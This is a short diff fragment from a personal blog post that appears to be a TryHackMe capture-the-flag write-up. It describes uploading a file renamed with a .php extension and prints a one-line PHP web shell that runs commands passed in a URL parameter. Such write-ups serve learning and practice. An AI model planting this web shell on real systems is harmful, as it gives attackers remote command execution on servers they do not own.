player-unknown-00/player-unknown-00.github.io/_posts/2025-02-25-thm-bandit.md

 - Give a new filename with a .php extension and see if it works

-- Also add some php code - the shortest php exploit code available
+- Also add some php code - the shortest php exploit code available:

 ```bash
 <?=`$_GET[0]`?>